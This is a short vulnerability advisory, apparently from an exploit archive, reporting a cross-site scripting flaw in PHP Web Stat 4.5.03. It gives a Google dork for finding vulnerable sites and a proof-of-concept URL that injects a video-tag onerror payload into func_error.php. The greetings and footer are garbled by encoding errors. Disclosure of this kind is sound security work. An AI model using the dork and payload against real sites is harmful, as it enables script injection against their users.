PHP Web Stat version 4.5.03 suffers from a cross site scripting vulnerability.
51622091cd9294b6f4a4bd8ea3c5c88f========================================================================
| # Title : php web stat v4.5.03 xss vulnerability
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 10 FranASSais V.(Pro)
| # Version : v4.5.03
| # Vendor : http://wmscripti.com/
| # Dork : Copyright A(c) 2010 PHP Web Stat A* Version 4.5.03
========================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] add payload : func/func_error.php/%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt(771818860)%22%3E
http://127.0.0.1/Site%20Dosyalar_14/stat/func/func_error.php/%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt(771818860)%22%3E
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================